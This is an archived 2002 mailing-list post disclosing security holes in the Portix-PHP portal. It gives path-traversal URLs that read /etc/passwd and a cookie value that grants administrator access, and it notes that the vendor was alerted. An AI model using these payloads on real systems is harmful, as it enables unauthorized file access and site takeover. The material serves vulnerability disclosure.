Vulnerability Development mailing list archives

Big Security Holes in Portix-PHP Portal

From: frog frog <leseulfrog () hotmail com>
Date: 31 Jan 2002 16:19:47 -0000



On all version. The last one is 0.4.02 .

To view files in the hard disk :

www.hostportix.com/index.php?l=../../../etc/passwd

www.hostportix.com/index.php?
l=forum/view.php&topic=../../../etc/passwd

To be administrator :
Send the cookie name=access value=ok 
to /config/config.php .

Portix team has been alerted.

Current thread:

Big Security Holes in Portix-PHP Portal frog frog (Jan 31)
- <Possible follow-ups>
- Re: Big Security Holes in Portix-PHP Portal Frog Frog (Jan 31)